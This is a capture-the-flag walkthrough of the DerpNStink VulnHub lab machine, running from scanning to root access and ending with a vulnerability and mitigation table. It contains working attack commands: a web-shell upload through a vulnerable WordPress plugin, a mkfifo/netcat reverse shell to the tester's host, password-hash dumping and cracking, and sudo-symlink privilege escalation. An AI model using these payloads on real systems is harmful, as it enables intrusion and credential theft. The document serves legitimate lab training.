DerpNStink: 1 ~ VulnHub - Walkthrough
Contents
Objective
Remotely attack the VM and find all 4 flags eventually leading you to full root access.
Source: [VulnHub.com]
Status: [Completed]
Methodology
Discovery
root@kali:~# nmap -O -sT -sV -p- -T5 192.168.56.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 05:21 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 05:21 (0:00:03 remaining)
Nmap scan report for 192.168.56.105
Host is up (0.00068s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:FF:CF:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...
Entry Point #1 - Port 80 (HTTP)
Enumeration
root@kali:~# nikto -h 192.168.56.105 -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.105
+ Target Hostname: 192.168.56.105
+ Target Port: 80
+ Start Time: 2018-03-26 05:22:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x512 0x55dcb6aaa2f50
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/temporary/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7537 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-03-26 05:22:34 (GMT-4) (12 seconds)
---------------------------------------------------------------------------root@kali:~# curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /php/
Disallow: /temporary/Let's take a look at the source of http://192.168.56.101/
Two things popped up
root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# curl -s http://192.168.56.101 |grep flag
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->And
<script type="text/info" src="/webnotes/info.txt"></script>/temporary/ tells me to "try harder!"
/php/ returns 403 Forbidden
Digging deeper with "dirb"
root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# dirb http://192.168.56.101 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -R
...
---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/
+ http://192.168.56.101/index.html (CODE:200|SIZE:1298)
==> DIRECTORY: http://192.168.56.101/javascript/
==> DIRECTORY: http://192.168.56.101/js/
==> DIRECTORY: http://192.168.56.101/php/
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:53)
+ http://192.168.56.101/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.56.101/temporary/
==> DIRECTORY: http://192.168.56.101/weblog/
---- Entering directory: http://192.168.56.101/css/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/javascript/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/js/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/php/ ----
(?) Do you want to scan this directory (y/n)? y + http://192.168.56.101/php/info.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.101/php/phpmyadmin/
---- Entering directory: http://192.168.56.101/temporary/ ----
(?) Do you want to scan this directory (y/n)? y + http://192.168.56.101/temporary/index.html (CODE:200|SIZE:12)
---- Entering directory: http://192.168.56.101/weblog/ ----
(?) Do you want to scan this directory (y/n)? y + http://192.168.56.101/weblog/index.php (CODE:200|SIZE:14903)
==> DIRECTORY: http://192.168.56.101/weblog/wp-admin/
==> DIRECTORY: http://192.168.56.101/weblog/wp-content/
==> DIRECTORY: http://192.168.56.101/weblog/wp-includes/
+ http://192.168.56.101/weblog/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.101/php/phpmyadmin/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/weblog/wp-admin/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/weblog/wp-content/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
---- Entering directory: http://192.168.56.101/weblog/wp-includes/ ----
(?) Do you want to scan this directory (y/n)? n
Skipping directory.
....Let's check out that WordPress install
root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# curl -L http://192.168.56.101/weblog
curl: (6) Could not resolve host: derpnstink.localOk! Let's update /etc/hosts and try again.
Now WP site loads w/out issues. Before exploring further we try a few simple credential combinations and what do you know - admin:admin lets us in!
Not going to post any screenshots of WP internals as that's a pretty common sight these day.
Let's see what we can do now that we're in. Looks out that plugin upload is disabled but let's see what we can do with what we have installed already
root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# wpscan --enumerate vp --url http://192.168.56.101/weblog/ |grep "[!]"
[!] The WordPress 'http://derpnstink.local/weblog/readme.html' file exists exposing a version number
[!] 5 vulnerabilities identified from the version number
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
[!] The version is out of date, the latest version is 1.4
[!] The version is out of date, the latest version is 1.6.7.1
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)Exploitation
Looks like Slideshow Gallery allows for unchecked uploads. Trying WordPress Plugin - shell.php (variant 1).
Quick test... Works!!!
root@kali:~/Desktop/DerpNStink# curl http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php?cmd=hostname
DeRPnStiNKNow let's do something more exciting - spinning a reverse shell!!!
First start a local listener.
kali@root $ nc -lt -p 4444Then execute a remote command to connect to our listener. There are many different ways to do this, depending on what's allowed on the remote host. I'll do a nice write up on that soon but for now let's just use a simple 'sh' based, a method which proven to work for me 99% of the time.
kali@root $ curl -G "http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php" --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.203 4444 >/tmp/backpipe"And we have a "$"!
kali@root $ nc -lt -p 4444
$ pwd
/var/www/html/weblog/wp-content/uploads/slideshow-gallery
$ hostname
DeRPnStiNKLooking around I realized that this box was P0wned before and someone already dropped shell.php before which I overwrote. I might spin up the original VM once again later to see what it was. Meanwhile there is another shell in there as well (elidumphy.php). And all that was obvious inside the "Manage Slide" section! Got too excited i guess to drop my stuff in.
Now let's get a TTY so we can have an interactive shell!
$ python -c 'import pty; pty.spawn("/bin/sh")'Looking around the filesystem, nothing obvious, at least for www-data account. That's until we check wp-config.php which gave us username/pass for mysql 'root' account!!!
Let's take a look at mysql database see if we can get anything useful out of it!
www-data@DeRPnStiNK:/var/www/html/weblog$ mysql -u root -p <mysql>
mysql> use wordpress;
mysql> select user_login, user_pass from wp_users;
select user_login, user_pass from wp_users;
+-------------+------------------------------------+
| user_login | user_pass |
+-------------+------------------------------------+
| unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 |
| admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ |
+-------------+------------------------------------+
2 rows in set (0.00 sec)
use mysql
Database changed
mysql> select User, Password from user;
select User, Password from user;
+------------------+-------------------------------------------+
| User | Password |
+------------------+-------------------------------------------+
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |
| unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB |
| phpmyadmin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+------------------+-------------------------------------------+
7 rows in set (0.00 sec)Let's check out unclestinky with hashcat
root@kali:~# hashcat -a 0 -m 300 9B776AFB479B31E8047026F1185E952DD1E530CB /usr/share/wordlists/rockyou.txt --force
...
9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57
...
www-data@DeRPnStiNK:/var/www$ su stinky
su stinky
Password: wedgie57
stinky@DeRPnStiNK:/var/www$Poking around user's directories we find Flag #3
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)Further search revealed two more items - a private key for 'stinky' - key.txt, and some sort of chat logs discussing some sort of network capture related to WP login issues.
First let's try to log in with the private key
# ssh -i ./stinky_rsa stinky@192.168.56.101
Ubuntu 14.04.5 LTS
,~~~~~~~~~~~~~..
' Derrrrrp N `
,~~~~~~, | Stink |
/ , \ ', ________ _,"
/,~|_______\. \/
/~ (__________)
(*) ; (^)(^)':
=; ____ ;
; """" ;=
{"}_ ' '""' ' _{"}
\__/ > < \__/
\ ," ", /
\ " /"
" "=That worked. Now let's look for the network capture file - maybe we'll find something there?! mrderp is asking stinky to recreate his account.
stinky@DeRPnStiNK:~/Documents$ ls
derpissues.pcap
...
$ grep -a pass1 derpissues.pcap
action=createuser&_wpnonce_create-user=b250402af6&_wp_http_referer=%2Fweblog%2Fwp-admin%2Fuser-new.php&user_login=mrderp&email=mrderp%40derpnstink.local&first_name=mr&last_name=derp&url=%2Fhome%2Fmrderp&pass1=derpderpderpderpderpderpderp&pass1-text=derpderpderpderpderpderpderp&pass2=derpderpderpderpderpderpderp&pw_weak=on&role=administrator&createuser=Add+New+User�3 Z��
DD���YE4�Z@@��g��P�2�6OPJ�����U�(��Now that we have mrderp's pass
mrderp@DeRPnStiNK:~$ whoami
mrderp
mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*And with it we hit a gold mine
mrderp@DeRPnStiNK:~/binaries$ ln -s /bin/bash derpy_bash
mrderp@DeRPnStiNK:~/binaries$ sudo `pwd`/derpy_bash
root@DeRPnStiNK:~/binaries# whoami
rootChecking out /root
root@DeRPnStiNK:/root# find /root -name flag*
/root/Desktop/flag.txt
...
root@DeRPnStiNK:/root# cat /root/Desktop/flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodoSo we have Flag#1, Flag#3, and Flag#4. Now need to find Flag#2. After spending good amount of time searching around the filesystem I decided to take another look at the site or to be more specific at the database backend.
stinky@DeRPnStiNK:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
...
mysql> use wordpress;
...
Database changed
mysql> select post_content from wp_posts where post_content like '%flag%';
+-------------------------------------------------------------------------+
| post_content |
+-------------------------------------------------------------------------+
| flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) |
| flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) |
+-------------------------------------------------------------------------+
2 rows in set (0.00 sec)Objective achieved - 4 flags + root access.
Appendix A: Vulnerability Detail and Mitigation
| Rating | High |
| Description | The password for WordPress admin account is the same as username (admin:admin) |
| Impact | These types of passwords are very easy to guess |
| Remediation | Enforce stronger password policies. A strong password should be at least 8 characters, should not contain any personal information, including user id, it should not contain any words spelled correctly and it should contain numbers, letters, and special characters. |
| Rating | High |
| Description | User 'unclestinky" was found to reuse the same password between mysql and system logins. |
| Impact | Password reuse is a practice which should be highly discouraged and prevented to the extent possible as it potentially allows an increase in attack surface. In this case, the impact is amplified by the fact that an attacker who was able to extract user credentials from mysql database would be able to reuse said credentials to gain access to user's system account. |
| Remediation | Policies need to be put in place to enforce the use of unique passwords. The use of password managers should be encouraged to aid users in utilizing unique passwords across various systems. |
| Rating | High |
| Description | Website contains a number of plug-ins with known vulnerabilities. |
| Impact | A combination of unpatched components and weak authentication allows an attacker to upload arbitrary scripts and files to the system which can be then loaded via the website allowing an attacker to execute arbitrary commands to escalate access, exfil data, or otherwise damage the system. |
| Remediation | All assets should be kept current with latest patches and updates. This can be achieved with native tools (e.g. built-in auto-update functionality) or third party applications. |
| Rating | High |
| Description | 'sudo' is improperly configured for 'mrderp' account |
| Impact | An attacker who manages to compromise this account will be able to execute arbitrary commands with 'root' access. |
| Remediation | Do not allow executing commands as 'root' which are located in user home directory or any location where these can be modified by a non-root user. |
| Rating | Low |
| Description | PHPMyAdmin was discovered at the default install path |
| Impact | Using default path/locations makes it easier for attackers to locate components |
| Remediation | Use non-standard naming convention where possible. |
If you have any questions feel free to hit me up on twitter @blaksec
<Ctrl>-D